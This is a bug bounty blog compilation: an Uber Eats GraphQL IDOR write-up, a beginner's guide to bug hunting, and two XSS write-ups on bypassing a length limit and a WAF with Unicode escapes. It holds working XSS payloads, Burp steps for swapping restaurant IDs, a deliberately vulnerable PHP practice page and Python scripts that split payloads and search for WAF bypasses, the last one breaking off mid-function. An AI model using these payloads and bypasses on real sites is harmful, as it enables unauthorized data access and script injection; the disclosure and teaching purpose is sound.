Categories
Bug Bounty

IDOR Leads To Leak Any Uber Eats Restaurant Analytics

Hi fellow Hackers,
At first, Ramadan Kareem! Wishing everyone a very happy Ramadan. Today I will write about an Insecure Direct Object Reference (IDOR) vulnerability that I recently discovered in Uber Eats for Restaurants.

The Uber Eats Restaurant web application at https://restaurant.uber.com/ uses GraphQL. Back in March, I was collaborating on an Uber report with Sifat Bhai. During that engagement he discovered an IDOR in GraphQL that leaked data belonging to other restaurants, but the leaked data contained nothing sensitive enough to report on its own. So I decided to take a closer look at that functionality.

Issue Background: In the Uber Eats for Restaurants dashboard there is an Analytics option where store owners can see their restaurant’s analytics for the last 12 months. The analytics page lives at https://restaurant.uber.com/v2/home/{locationUUIDs}/analytics/sales, and when it loads, multiple GraphQL requests pull the data and the page renders it into a readable view. I noticed that all of those requests contain a locationUUIDs parameter like "locationUUIDs":["0292a209-df33-496b-b65b-192c86603d48"], where 0292a209-df33-496b-b65b-192c86603d48 is the locationUUIDs value of my own test account. When I changed the locationUUIDs value to another account’s value, the request still succeeded and the response carried JSON data for that other restaurant, which caught my attention: the server was trusting the client-supplied location ID without checking that my account owned it. The raw response body alone, however, is not very readable; to make sense of the data it needs to be rendered through the web page.

Automation with Burp: To let the web page do the parsing for me, I used Burp Suite’s Match and Replace option.

  1. In Burp go to Proxy => Options => Match and Replace.
  2. Click Add and set up a rule like the screenshot below, where the Match value is my own restaurant’s locationUUIDs value and the Replace value is the other restaurant’s locationUUIDs value. Because the rule is a plain string replacement on the request body, every GraphQL request the page issues carries the other restaurant’s UUID.

    Match-and-Replace

  3. I also added a rule (screenshot below) that changes the currency from BDT to USD, so all analytics are shown in USD.

    Currency Match and Replace

Final Exploit

  1. Visit https://restaurant.uber.com and log in with a valid restaurant account (username, password and whatever additional authentication is required).
  2. Configure the browser to proxy through Burp Suite and keep Intercept OFF.
  3. Visit https://restaurant.uber.com/v2/home/{victims_locationUUIDs}/analytics/sales
  4. Every request from the browser passes through Burp, the Match and Replace rule swaps in the victim’s locationUUIDs value on every GraphQL request, and the page renders the victim restaurant’s analytics in a readable view.

    Sales data
    Sales by Item
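To make the authorization failure concrete, here is an added example in Python (my code, not Uber’s and not the author’s). It does what the Burp rule does, but on the parsed JSON body so that only the locationUUIDs variable is touched, and it contrasts a resolver that trusts the client-supplied locationUUIDs with one that checks them against the session’s ownership set. The victim UUID, the session identifiers, the operationName and the analytics rows are all constructed; the only real value is the author’s own locationUUIDs, and it is an assumption that the UUIDs travel inside the GraphQL variables object.

```python
import json
from typing import Callable, Dict, List, Optional

# Constructed sample data. The attacker's UUID is the one from the write-up; the
# victim UUID, the session tokens and the analytics rows are hypothetical.
ATTACKER_UUID = "0292a209-df33-496b-b65b-192c86603d48"
VICTIM_UUID = "7f0c2d1e-5a6b-4c3d-9e8f-0a1b2c3d4e5f"  # hypothetical

# Which locations each session is entitled to read (what the resolver should consult).
OWNED: Dict[str, set] = {
    "session-attacker": {ATTACKER_UUID},
    "session-victim": {VICTIM_UUID},
}

# Per-location analytics rows the GraphQL resolver hands back (constructed).
ANALYTICS: Dict[str, dict] = {
    ATTACKER_UUID: {"orders": 12, "sales": 180.0, "topItem": "Test item"},
    VICTIM_UUID: {"orders": 941, "sales": 14230.5, "topItem": "Beef biryani"},
}


def rewrite_location_uuids(body: str, own: str, target: str) -> str:
    """Do what the Burp match-and-replace rule does, but on the parsed JSON so only the
    locationUUIDs variable is rewritten (a raw string replace would hit any field that
    happened to contain the UUID). Assumes the UUIDs travel in GraphQL 'variables'."""
    req = json.loads(body)
    variables = req.setdefault("variables", {})
    variables["locationUUIDs"] = [
        target if uuid == own else uuid for uuid in variables.get("locationUUIDs", [])
    ]
    return json.dumps(req)


def resolve_sales_vulnerable(session: str, location_uuids: List[str]) -> Dict[str, Optional[dict]]:
    """The IDOR: the resolver trusts the client-supplied IDs and never checks that the
    caller's session owns them, so any known UUID returns that restaurant's analytics."""
    return {uuid: ANALYTICS.get(uuid) for uuid in location_uuids}


def resolve_sales_fixed(session: str, location_uuids: List[str]) -> Dict[str, Optional[dict]]:
    """Hardened resolver: authorize every requested location against the session's
    ownership set before reading anything, and fail closed on the first miss."""
    allowed = OWNED.get(session, set())
    denied = [uuid for uuid in location_uuids if uuid not in allowed]
    if denied:
        raise PermissionError(f"session not authorized for locations {denied}")
    return {uuid: ANALYTICS.get(uuid) for uuid in location_uuids}


def probe_idor(resolver: Callable[[str, List[str]], Dict[str, Optional[dict]]],
               session: str, own: str, target: str) -> bool:
    """Replay the page's own request with the target UUID swapped in and report whether
    the resolver still returns data. True means the object reference is not authorized."""
    body = json.dumps({
        "operationName": "getSalesAnalytics",  # hypothetical operation name
        "variables": {"locationUUIDs": [own], "currencyCode": "BDT"},
    })
    tampered = json.loads(rewrite_location_uuids(body, own, target))
    try:
        rows = resolver(session, tampered["variables"]["locationUUIDs"])
    except PermissionError:
        return False
    return any(row is not None for row in rows.values())


if __name__ == "__main__":
    for name, resolver in (("vulnerable", resolve_sales_vulnerable), ("fixed", resolve_sales_fixed)):
        leaked = probe_idor(resolver, "session-attacker", ATTACKER_UUID, VICTIM_UUID)
        print(f"{name} resolver leaks another restaurant's analytics: {leaked}")
```

probe_idor() is the same check the write-up performs by hand: replay the page’s own query with another restaurant’s ID and see whether data comes back. The fix is not to hide the UUID (it can be fuzzed, as the author told Uber) but to authorize every object reference on the server, on every request.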

Impact

An attacker can access all analytics of a target restaurant, which includes the ability to:

  • Choose a date range to see that date range analytics.
  • Orders analytics view and Clicking on Download will Download a CSV copy.
  • Track orders placed over time to monitor a restaurant’s popularity.
  • Track ticket size over time to see if a restaurant is receiving larger orders.
  • Learn when a target store tends to generate most of its sales.
  • Learn when customers tend to place the most orders in a target restaurant.
  • Learn when customers tend to place the largest orders in a target restaurant.
  • See which items are a restaurant’s top sellers.

To exploit this, an attacker only needs the target restaurant’s locationUUIDs value, and I showed the Uber security team a practical way to fuzz that value for any restaurant. The vulnerability was reported as report #1116387 under the Uber Bug Bounty Program and a $2,000 bounty was awarded. Check out the video POC too.

Hope you guys enjoyed this one. 

#Stay_Home
#Stay_Safe
#Wash_Your_Hand_Frequently
#Hack_The_Planet🔥


How to Get Into Bug Bounties – Part 01

A common question nowadays is “How do I get started in bug bounties?”, and I get this message on a daily basis. It’s not possible for me to respond to each and every message, so I thought I’d rather write a blog post and direct all those beginners to it.

I am still a learner when it comes to hacking, and I’ve been in the bug bounty field for 3+ years now. There is still so much to learn each and every day and I’m not an expert yet. This post is mainly for people who are absolute beginners, who are thinking about getting started in bug bounty, or who are planning to change their field.

What are Bug Bounties?

A bug bounty program is a deal offered by many websites, organizations and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to security exploits and vulnerabilities. These programs allow the developers to discover and resolve bugs before the general public is aware of them, preventing incidents of widespread abuse. Bug bounty programs have been implemented by a large number of organizations, including Facebook, Google, Twitter, Microsoft, Uber, GitHub, the Internet Bug Bounty and many more. Companies outside the technology industry, including traditionally conservative organizations like the United States Department of Defense, have started using bug bounty programs hosted on HackerOne.

Formal Education vs Information Security

I’ve seen a lot of people think you need a computer science background to be good at hacking. This is not correct. I myself come from a Power Engineering background; I have been interested in information security since school, but joined the Power Engineering field on the advice of family members. My main focus has always been information security.

Being from a computer science background helps, but it is not compulsory; you do, however, have to learn the computer science fundamentals yourself. So if you are from a non-technical background, get started only if you are genuinely interested in learning about information security, not ONLY interested in $$$.

Keep in mind

  • No one will be able to tell you everything about this field. It’s a long path that you have to travel yourself, with help from others along the way.
  • Do not expect someone to spoon-feed you everything.
  • Focus less on $ and more on learning.
  • If you think you will become successful overnight, or within a week or a month, this is not a field you should join.
  • Bug bounties are very competitive nowadays; it took me more than six months to find my first valid vulnerability, so be patient and practice every day.

Basic Technical things to get started

You must have a basic understanding of how things work on the internet. Learn how things work before getting into bug bounty hunting, so you don’t have to ask random people why a payload isn’t working. There are many things to learn and I cannot list all of them here; I’m listing a few important topics, and you should learn more by yourself.

  • HTTP/HTTPS: HTTP is the communication protocol designed for communication between web browsers and web servers. From that description alone you should understand how important it is. Go through the resources below to get a basic idea of the HTTP protocol, HTTP requests and responses, status codes, encoding/decoding, the same-origin policy (SOP), cookies, MIME types and HTML parsing; all of this will definitely help you later.
  • Basic Networking: A basic understanding of networking is important for anyone who works with computers. I took the Certified Network Security Specialist course and personally found it really helpful. I can suggest the resources below to learn the basics of networking.
  • Programming/Coding: To be a good hacker you don’t need to be a great programmer, but it’s always good to cover the basics so that you understand what’s happening when you look at a chunk of code. Understanding the code increases your chances of successfully identifying and exploiting a vulnerability, and you may also need code to escalate a low/medium severity bug to high/critical. Back in 2016, when I was just learning about XSS, I had no real knowledge of programming; all I used to do was copy-paste XSS payloads into user inputs without understanding a thing. The fun fact is that I used to test with the payloads below without understanding that they are all the same (the tag name is case-insensitive and the src value is irrelevant as long as it fails to load; what fires is the onerror handler), so I was just wasting my time 😷
    <img src=x onerror="alert(document.domain)">
    <IMG SRC=A onerror="alert(document.domain)">
    <IMG SRC=B onerror="alert(document.domain)">
    <IMG SRC=b onerror="alert(document.domain)">
    <IMG SRC=# onerror="alert(document.domain)">
    <IMG SRC=x onerror="alert(document.domain)">
    <IMG SRC=y onerror="alert(document.domain)">
    <IMG SRC=Z onerror="alert(document.domain)">

    After reading my story I hope you understand how basic coding knowledge can save your time and give you an advantage later with automation and exploration. I’ll suggest a few languages that one should have at least basic to intermediate knowledge of, and keep advancing in them.

HTML:

  1. https://www.w3schools.com/html/
  2. https://www.codecademy.com/learn/learn-html
  3. https://htmldog.com/guides/html/advanced/

PHP:

  1. https://www.w3schools.com/php/
  2. https://www.codecademy.com/learn/learn-php
  3. https://www.guru99.com/php-tutorials.html
  4. https://www.codecademy.com/learn/paths/web-development

JavaScript:

  1. https://www.w3schools.com/js/
  2. https://www.youtube.com/watch?v=PkZNo7MFNFg
  3. https://www.codecademy.com/learn/introduction-to-javascript

SQL(Structured Query Language):

  1. https://www.youtube.com/watch?v=HXV3zeQKqGY
  2. https://www.w3schools.com/sql/
  3. https://www.codecademy.com/learn/learn-sql

Automation: "Never send a human to do a machine’s job". Knowledge of the languages below will help you automate your tasks, write your own tools, understand many common tools and modify them according to your needs.

Bash:

  1. https://0xprial.com/wp-content/uploads/2021/02/bash-bug-bounty.pdf
  2. https://0xprial.com/wp-content/uploads/2021/02/Coding-For-Pentester.pdf
  3. https://www.tutorialspoint.com/unix/shell_scripting.htm
  4. https://www.learnshell.org/
  5. https://medium.com/quick-code/top-tutorials-to-learn-shell-scripting-on-linux-platform-c250f375e0e5

Ruby:

  1. https://www.learnrubyonline.org/
  2. https://www.codecademy.com/learn/learn-ruby

Python:

  1. https://realpython.com/
  2. https://www.amazon.com/Python-Web-Penetration-Testing-Cookbook-ebook/dp/B00YSILC2K
  3. https://docs.python.org/3/tutorial/

Golang:

  1. https://tour.golang.org/welcome/1
  2. https://www.udemy.com/learn-go-the-complete-bootcamp-course-golang/

Choose a Path to Learn

Now it’s time to learn about vulnerabilities. In a bug bounty program you may encounter different types of assets to test, such as:

  1. Source Code
  2. IoT
  3. Hardware
  4. Reverse Engineering
  5. Host
  6. Mobile Application
  7. Web Application

You have to choose one of them to start learning. Most people choose web applications first because they are the easiest to get started with.

Learning about Vulnerabilities

One vulnerability at a time. Look at the OWASP Top 10 and pick one vulnerability, then master it. Create your own local sandbox environment and test for that type of vulnerability. Play with the application and try to find out why it is vulnerable. Then look for it everywhere on the internet [test only with proper permission or under a responsible disclosure policy]. While learning about a vulnerability, keep the points below in mind:

  • How do you test for that vulnerability and identify it?
  • How do you bypass WAFs and other common defenses?
  • How does a fixed/secured endpoint look or react?

Let me show you my way of learning new things, starting with XSS. Whenever I try to learn something new in infosec I first ask Google, because “Google is your friend”. I search with the dorks below, open all the results in new tabs, read them all and try to figure out how those bugs were discovered and how they were tested.

  • XSS site:hackerone.com
  • XSS site:medium.com
  • XSS POC site:youtube.com

Then I test what I learned on my localhost. I dug up the code below, which I used when I was practicing XSS back in 2016. It exposes three injection points: one unescaped, one escaped with htmlspecialchars() in a text context, and one escaped but placed inside an href, where escaping quotes and angle brackets alone is not enough.

<?php
        // Practice page with three XSS injection points (deliberately vulnerable).
        // The null-coalescing defaults stop PHP from warning when a parameter is absent.
        $val  = htmlspecialchars($_GET['no_xss'] ?? '', ENT_QUOTES); // escaped: safe in text context
        $val2 = $_GET['xss'] ?? '';                                   // unescaped: plain reflected XSS
        $val3 = htmlspecialchars($_GET['r_xss'] ?? '', ENT_QUOTES);  // escaped, but lands in an href
?>

<html>
<body>
    <center>
            <h1>
            Injection Point 1 :- <?=$val2?><br>
            Injection Point 2 :- <?=$val?><br>
            <!-- htmlspecialchars() only neutralises quotes and angle brackets; a value
                 such as javascript:alert(1) contains neither, so it survives into the href -->
            <a href="<?=$val3?>">Tricky XSS :')</a>
            </h1>
    </center>
</body>
</html>

There are many other vulnerable apps available. You can use them to gain practical experience on a vulnerability. Some of them are:

  1. DVWA
  2. bWAPP
  3. OWASP WebGoat

CTFs are not always great for learning:

  1. Real targets are never going to be as vulnerable as a CTF is.
  2. The more you rely on learning from them the harder the jump is to real targets.
  3. The experience will help you in bug bounty, but the transition is never going to be easy.

Learning new stuff while testing:

While you are testing for a specific vulnerability type you may encounter something unfamiliar. For example, you discover a GraphQL endpoint but you don’t know much about it. Should you ignore it? No! Note down that endpoint, stop testing, then:

  1. Go to Google and learn about that technology, then come back to that endpoint and test it for vulnerabilities.
  2. If that doesn’t work, set up that technology or application in a sandbox and test there to gain experience.


Read other Researchers write-ups and disclosed reports

Regularly read other researchers’ write-ups to understand their methodology and how they approach vulnerabilities. I suggest starting with InfoSec Write-ups, which contains a huge number of POC write-ups by many researchers. Also keep a regular eye on HackerOne’s Hacktivity. Reading other researchers’ write-ups and disclosed HackerOne reports allows you to:

  • Learn what other hackers look at and what they found.
  • Understand other researchers’ thinking and testing process.
  • See how they approach a vulnerability.
  • See how they tested for that vulnerability.

Reconnaissance

Recon is a set of processes and techniques (footprinting, scanning and enumeration) used to covertly discover and collect information about a target system. During reconnaissance, an ethical hacker attempts to gather as much information about the target system as possible. For recon, I suggest reading Dirty-Recon.pdf

Should you rely on automated tools?

As a beginner, you should avoid automated tools unless you know what a tool does and how it works:

  • Don’t rely on tools, except for a proxy.
  • Use tools only when you understand how and why they work.

Which targets should you choose as a beginner?

As a beginner you should avoid paid bounty programs and put that effort into VDP programs to earn reputation points, Hall of Fame entries and swag. You will gain experience along the way. Focus less on $$$ and more on learning: test programs with a VDP, or independent sites that offer a Hall of Fame or swag. There are lots of queries you can use to search Google for such programs; here are some popular ones (don’t forget to try different languages!):

inurl:responsible disclosure
inurl:security site:target.com 
"report security vulnerability"
"vulnerability disclosure"
"powered by hackerone" "submit vulnerability report"
indesc:bug bounty|vulnerability disclosure
inurl: bug bounty
white hat program
"vulnerability reporting policy"
inurl:responsible-disclosure-policy

Pick a program you love and hunt there for a long time.

Writing a Decent Vulnerability Report 

In bug bounty, writing a well-explained report is the most important part. If you don’t write a good, well-described report you may end up confusing the triage team, which could result in:

  • Less Payment than expected.
  • Report closed as N/A.
  • Will take more time to confirm the vulnerability by the Triage team.

On the other hand, if your report is well explained, clear and contains all the necessary information, it will take less time to confirm the vulnerability and you will get your reward sooner. You may even get a bonus reward for a creative and detailed report. I have received several such rewards on reports that should have been closed as Won’t Fix or Out of Scope. See a few example scenarios below:

Scenario 1: In the screenshot below the vulnerability was in an out-of-scope asset, but I showed them how it could lead to a high-impact attack by writing a detailed report, and they rewarded me $800 and appreciated the detailed report.

Scenario-1

Scenario 2: In the screenshot below the company was an online banking service, and the vulnerability was that, using an expired/used password reset token of a user, an attacker could brute-force the login password, which could lead to account takeover. But it was a vulnerability in the PHP framework, and according to the policy it fell under Not Accepted vulnerabilities. Still, for my detailed report they paid a €50 bonus on a report that was closed as Won’t Fix.

Scenario-2

From the scenarios above you should understand how important it is to write a detailed and well-explained report. A vulnerability report should contain the following:

  1. Title
  2. Summary 
  3. Description
  4. Vulnerable Endpoint
  5. How You discovered it 
  6. How to reproduce
  7. Impact & Scenario
  8. Recommended Fix

Title: Give the report a title that describes the vulnerability. For example, if you discovered a reflected XSS in the contact endpoint of the 0xPrial.com domain, the title would be something like: Reflected XSS in 0xPrial.com domain’s contact endpoint.

Summary: Give a short summary of the vulnerability.

Description: Give detailed information about the vulnerability. For example, if you are reporting an XSS in the contact form, describe how the XSS happens on that endpoint and how it works.

Vulnerable Endpoint: List all the URLs/endpoints/assets that are vulnerable to the issue.

How you discovered it: Describe how you discovered that endpoint and the vulnerability, and list all scripts or tools you used.

How to reproduce: This is the most important part of a report. Write down all the steps needed to reproduce the issue, step by step, so that the triage team can follow them and reproduce it. Adding a screenshot with every step makes it easier for the triage team to follow. You can also create a video POC and add it to your report.

Impact & Scenario: Your bounty amount depends mostly on this section. Explain how an attacker can use the vulnerability to do something malicious against the organization. Describe the impact of the vulnerability: what else you can do with it, what an attacker can achieve with it, how an attacker can attack other users with it, and so on. Also add a realistic attack scenario if possible, to make the report more impactful.

Recommended Fix: Suggest a fix for the vulnerability. The dev team will push a fix based on the suggestion and may ask you to retest it.

Always keep the below points in mind while writing a report :

  • Never upload your POC screenshots/video anywhere public. You can use YouTube for a POC video, but ask the organization’s security team first and upload it as an Unlisted video.
  • Never publicly disclose your report or vulnerability details before it’s fixed properly.
  • Before publicly disclosing a vulnerability, get permission from the company.
  • If possible, use the program’s public PGP key to encrypt your report.

Some write-ups on writing a quality report

Must read

  1. Web Hacking 101 [ Get a free copy from https://hackerone.com/resources/web-hacking-101 ]
  2. Resources for Beginner Bug Bounty Hunters 
  3. Web Application Hacker’s Handbook
  4. Mastering Modern Web Penetration Testing
  5. The Hacker Playbook 1, 2 and 3
  6. The Mobile Application Hacker’s Handbook
  7. Breaking into Information Security

Twitter # tag you should follow

  1. #bugbounty
  2. #bugbountytips
  3. #infosec

Blogs You should follow

There are plenty of blogs Shared by Hackers daily that you can read to learn more and more. [ Any Blog Link Missing? Kindly add it in Comments ]

YouTube Channels You should follow.

These Channels are Shared By Hackers where They Upload their Video POC’s. Watching them you can understand how to demonstrate these types of attacks. [ Any Channel Link Missing? Kindly add it in Comments ]

At last pro tips for asking questions

Thanks for reading. Is there anything I missed? Feel free to let me know on the comment or contact me on Facebook.


XSS WAF & Character limitation bypass like a boss

Hello fellow Hackers!
I have been sitting in my room for the last 3 days due to the coronavirus outbreak worldwide and feeling really bored. So I thought, why not write up what I promised really long ago 🤭. A few months back, in a tweet, I shared a way to bypass an XSS WAF and a character limitation that I found on a private bug bounty site. Today I will share the technical details of that bypass. Hope you enjoy it 😇

Back in 2019 I was testing a web application that allows a user to create a photo album and upload photos to it. The interface looks like the screenshot below:

Application Interface 🤔

There is also an option to rename images when you click Edit, so naturally any researcher would test for XSS here, since the photo name is user-controlled. I changed the photo name to xsstest'">{{7*7}}

Then I noticed the following things –

  • There is a 15-character limit on that input, so only xsstest'">{{7*7 went through.
  • All special characters were escaped properly.
  • And finally, when I tried to load the album again I was redirected to /error.aspx?code=500 by the WAF, and I had to rename the image back to xsstest before the album would load again.

It looked like this input was well protected against XSS. Then I started playing with the other available options, with Burp Suite connected to my browser, leaving it open to capture all background requests in HTTP history. Going through the HTTP history tab, one background request caught my attention: https://subdomain.company.com/ajax/generateImageList.ashx?json={albums:[{"id":"","value":"on"}]}. This request served the album’s Slideshow option, and the page source of that endpoint was:

<a href="https://image-link.com/image.jpg" title="xsstest" rel="lightbox">84**00000</a>

Look at the title attribute value: it is our image name in that album. So I renamed my picture to xsstest'"> and checked the ajax/generateImageList.ashx page source again, and this time it was:

<a href="https://image-link.com/image.jpg" title="xsstest'">" rel="lightbox">84**00000</a>

So in this generateImageList.ashx endpoint:

  • the user’s input is not escaped properly, and
  • there is no WAF detection.

But we still have the 15-character limit, which makes this XSS nearly useless. The smallest payload I could think of for this context is "oncut="alert() (exactly 15 characters), which results in a blank popup when we press CTRL+X on Windows or COMMAND+X on OS X:

<a href="https://image-link.com/image.jpg" title=""oncut="alert()" rel="lightbox">84**00000</a>

Blank Popup 😪

I tried every way I could think of to bypass the character limit and was unable to. I stopped testing there and saved a note about this endpoint in my to-do list, to revisit the next time I tested this asset. About seven months later I started testing the asset again and came back to this endpoint. This time I noticed that I can upload multiple photos to an album, and when all photos of the album are selected the Slideshow request goes to https://subdomain.company.com/ajax/generateAlbumImageList.ashx?json={albums:[{"id":"","value":"on"}]} instead, whose page source is:

<a href="https://image-link.com/image.jpg" title="xsstest'">" rel="lightbox">84**00000</a><a href="https://image-link.com/image.jpg" title="xsstest'">" rel="lightbox">84**00001</a>

So now we have multiple injection points on one page. So why not upload 5 pictures to the album and use the payload I mentioned in my tweet? Each image name stays within the 15-character limit, and the HTML between two consecutive names is swallowed by a JavaScript block comment (/* */) that one name opens and the next one closes.
Payload:

  • 1st Injection: */</script><!--
  • 2nd Injection: */.domain)/*xxx
  • 3rd Injection: */(document/*xx
  • 4th Injection: */prompt/*xxxxx
  • 5th Injection: "><script>/*xss

The page source after the final injection becomes:

<a href="https://image-link.com/image.jpg" title=""><script>/*xss" rel="lightbox">84**00000</a><a href="https://image-link.com/image.jpg" title="*/prompt/*xxxxx" rel="lightbox">84**00001</a><a href="https://image-link.com/image.jpg" title="*/(document/*xx" rel="lightbox">84**00002</a><a href="https://image-link.com/image.jpg" title="*/.domain)/*xxx" rel="lightbox">84**00003</a><a href="https://image-link.com/image.jpg" title="*/</script><!--" rel="lightbox">84**00004</a>

Now visiting https://subdomain.company.com/ajax/generateAlbumImageList.ashx?json={albums:[{"id":"","value":"on"}]} executes the payload:

Popup Boom 😎🔥

You may wonder why I used the x character several times in the 2nd to 5th payloads. The answer is that the album images are sorted by name length and then by upload time. Padding every name to the same length makes the sort fall back to upload time, so the names land on the page in the order I uploaded them; the padding sits inside a JavaScript comment, so it never reaches the parser.
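The technique above generalises to any expression and any length limit. The following is an added example in Python (my code, not the author’s) that cuts a JavaScript expression into image names of at most 15 characters, rebuilds the album HTML the way the page emits it, and shows what the browser’s JavaScript engine actually parses once the comments are stripped. The anchor template and its counter suffix are reconstructed from the page source shown above; the chunking is general and cuts only at token boundaries, because a block comment counts as whitespace in JavaScript and would split an identifier like prompt into two tokens.

```python
import re
from typing import List

LIMIT = 15  # the input field's character limit from the write-up

# Page glue between two injection points, modelled on the album source in the write-up
# (counter suffix constructed). Everything between '/*' in one title and '*/' in the
# next lands inside a JavaScript block comment, so the glue must never contain '*/'.
ANCHOR = '<a href="https://image-link.com/image.jpg" title="{title}" rel="lightbox">84**0000{n}</a>'


def split_payload(js: str, limit: int = LIMIT) -> List[str]:
    """Break a JavaScript expression into image names of at most `limit` characters so
    that, once the names are concatenated through the page's HTML, they form a single
    <script> block whose HTML glue is hidden in /* */ comments. Chunks are cut only at
    token boundaries: a block comment is whitespace to the JavaScript parser, so an
    identifier such as `prompt` cannot be spread over two injection points."""
    opener = '"><script>/*'      # breaks out of title="" and opens the first comment
    closer = '*/</script><!--'   # closes the last comment and comments out trailing HTML
    room = limit - len('*/') - len('/*')
    tokens = re.findall(r'\w+|\W', js)
    chunks: List[str] = []
    current = ''
    for tok in tokens:
        if len(tok) > room:
            raise ValueError(f'token {tok!r} does not fit in {room} characters')
        if len(current) + len(tok) > room:
            chunks.append(current)
            current = ''
        current += tok
    if current:
        chunks.append(current)
    # Pad with x after '/*' so the padding is inside the comment, as in the write-up.
    middles = [('*/' + c + '/*').ljust(limit, 'x') for c in chunks]
    names = [opener.ljust(limit, 'x')] + middles + [closer]
    assert all(len(n) <= limit for n in names)
    return names


def render_album(names: List[str]) -> str:
    """The album listing as the page would emit it with the names unescaped, in order."""
    return ''.join(ANCHOR.format(title=t, n=i) for i, t in enumerate(names))


def executed_script(html: str) -> str:
    """What the JavaScript engine ends up parsing: the <script> body with the block
    comments (and the HTML glue hidden inside them) removed."""
    body = re.search(r'<script>(.*?)</script>', html, re.S).group(1)
    return re.sub(r'/\*.*?\*/', '', body, flags=re.S)


if __name__ == '__main__':
    names = split_payload('prompt(document.domain)')
    for n in names:
        print(f'{len(n):2d}  {n}')
    print(executed_script(render_album(names)))
```

Two things to check before using this against a real target: the glue between injection points must never contain */, which would close the comment early, and the page must render the names in the order you need, which in the write-up meant padding every name to the same length so the sort fell back to upload time.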

Hope you guys enjoyed this one.

#Stay_Home
#Stay_Safe
#Wash_Your_Hand_Frequently
#Hack_The_Planet🔥


Unicode vs WAF — XSS WAF Bypass

Hi readers,
At first, Eid Mubarak to all. May Allah bring you joy, happiness, peace and prosperity on this blessed occasion. Wishing you and your family a happy Eid! Eid Mubarak! On this blessed occasion I thought I’d share one of my findings as an Eid bonus 😜!
As the title says, this is a write-up about an XSS WAF bypass using Unicode escapes. First, a little about the application I was testing. It had a Save for later option that saves items in your account for later use. The request looks like this:

Target applications Save for later option request

If the user is authenticated, this POST request saves the items in the user’s account; if not, it just reflects some of the values back. I was manually fuzzing the parameters and noticed that the channel parameter value is reflected in the response body without proper escaping, in both the authenticated and the unauthenticated case. I sent a request with a channel value of "channel":"xss\"><" and the response was:

<a class="link nc-text-regular nc-blue js-movetocart" data-giftitemid="<ID>" data-skuid="<ID>" data-itemnumber="<ID>"
                     data-productid="<ID>" data-channel="xss"><" data-quantity="1"
                     data-isbundleitem="false" role="link" tabindex="0" aria-label="label">Move to cart</a>

Our input lands inside the <a> tag, and we can break out of the attribute because quotes and angle brackets are not filtered. So I thought I had plenty of ways to get XSS here, until I sent "channel":"xss\"onclick=\"alert(1)" and the response was:

WAF ! WAF ! WAF !!! 🤕

So there is a WAF in place. To bypass it I started fuzzing, with the following results:

"channel":"xss\"onclick=\"alert(1)" ==> WAF
"channel":"xss\"xss=\"alert(1)" ==> WAF
"channel":"xss\"onclick=\"alert(1)" ==> WAF
"channel":"xss\"xss=\"xxx(1)" ==> No WAF

So I tried to create a new tag instead of adding an event attribute to the <a> tag, sent "channel":"xss\"><xss>test", and the response was:

<a class="link nc-text-regular nc-blue js-movetocart" data-giftitemid="<ID>" data-skuid="<ID>" data-itemnumber="<ID>"
                     data-productid="<ID>" data-channel="xss">test" data-quantity="1"
                     data-isbundleitem="false" role="link" tabindex="0" aria-label="label">Move to cart</a>

So it also strips anything that looks like a tag, which means we can’t create our own tag; our only option is an event attribute on the <a> tag that gets past the WAF. I brute-forced with fuzzdb’s html-event-attributes.txt to see whether any event was not blocked by the WAF and got nothing interesting. Then I thought about Unicode: the body is JSON, so I sent a random \uXXXX escape to see whether it was decoded in the response, and bingo, the escapes are decoded to their original characters. So I started playing with Unicode escapes plus events again, and the results were:

"channel":"xss\"\u003E\u003Cxss\u003Etest" ==> data-channel="xss"><xss>test"
"channel":"xss\"xss=\"co\u006efirm(domain)" ==> No WAF
"channel":"xss\"onc\u006Cick=\"co\u006efirm(domain)" ==> HTTP/1.1 403 Forbidden

So we gained a new advantage and ran into a new problem:

  • The advantage is that we can now create HTML tags using Unicode escapes.
  • The problem is that even with Unicode escapes we get a new error, HTTP/1.1 403 Forbidden, when we add the event as onc\u006Cick.

So again I built a wordlist from html-event-attributes.txt plus Unicode escapes and found that the onmous\u0045leave and ond\u0072ag events came back HTTP/1.1 200 OK, and we can create HTML tags as well. So I made my final payload:

xss\"\u003E\u003Ch1  onmous\u0045leave=co\u006efirm(domain)\u003ECome to Me\u003C/h1\u003E\u003Cbr\u003E\u003C!--

And response body was:

<a class="link nc-text-regular nc-blue js-movetocart" data-giftitemid="<ID>" data-skuid="<ID>" data-itemnumber="<ID>"
                     data-productid="<ID>" data-channel="xss"><h1  onmouseleave=confirm(domain)>come to me</h1><br><!--" data-quantity="1"
                     data-isbundleitem="false" role="link" tabindex="0" aria-label="label">Move to cart</a>
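An added Python example (my code, not the target’s or the author’s) of the decode gap the write-up exploits: a blocklist applied to the raw request body sees onc\u006Cick, while the application’s JSON parser hands the template onclick. The blocklist regex is a constructed stand-in, not the real WAF, which in the write-up also caught some escaped handler names and forced the author to fuzz the whole event list; the mechanism is the same. The example also shows the two fixes: matching after decoding the same way the application does, and attribute-encoding the reflected value.

```python
import html
import json
import re
from typing import List

# Constructed stand-in for the WAF: a blocklist applied to the raw request body.
RAW_WAF = re.compile(r'on[a-z]+\s*=|confirm\s*\(|alert\s*\(', re.I)


def json_body(channel: str) -> str:
    """Wrap the channel value as it travels on the wire; `channel` already carries JSON
    escapes such as \\" and \\u006e."""
    return '{"channel":"' + channel + '"}'


def waf_blocks(raw_body: str) -> bool:
    """Inspects the bytes as sent, which is what a body-matching WAF rule does."""
    return RAW_WAF.search(raw_body) is not None


def app_decodes(raw_body: str) -> str:
    """The application parses the JSON first, so \\uXXXX escapes collapse to plain characters."""
    return json.loads(raw_body)["channel"]


def unicode_variants(fragment: str) -> List[str]:
    """Every spelling of `fragment` with exactly one character replaced by its \\uXXXX
    escape. The JSON decoder turns each one back into `fragment`."""
    return [fragment[:i] + '\\u%04x' % ord(ch) + fragment[i + 1:] for i, ch in enumerate(fragment)]


def find_bypasses(prefix: str, fragment: str, suffix: str) -> List[str]:
    """Wire-level channel values that pass the raw blocklist yet decode to the intended
    string. This mirrors the write-up's fuzzing loop, keeping only the variants whose
    decoded form is exactly the markup we wanted."""
    wanted = json.loads(json_body(prefix + fragment + suffix))["channel"]
    hits = []
    for variant in unicode_variants(fragment):
        raw = json_body(prefix + variant + suffix)
        if not waf_blocks(raw) and app_decodes(raw) == wanted:
            hits.append(prefix + variant + suffix)
    return hits


def normalised_waf_blocks(raw_body: str) -> bool:
    """Correct WAF placement: decode the body the way the application does, then match."""
    return waf_blocks(app_decodes(raw_body))


def render_fixed(channel: str) -> str:
    """Output-encoding fix for the template: a value that cannot close the attribute
    cannot add handlers or tags, whatever the WAF thinks of it."""
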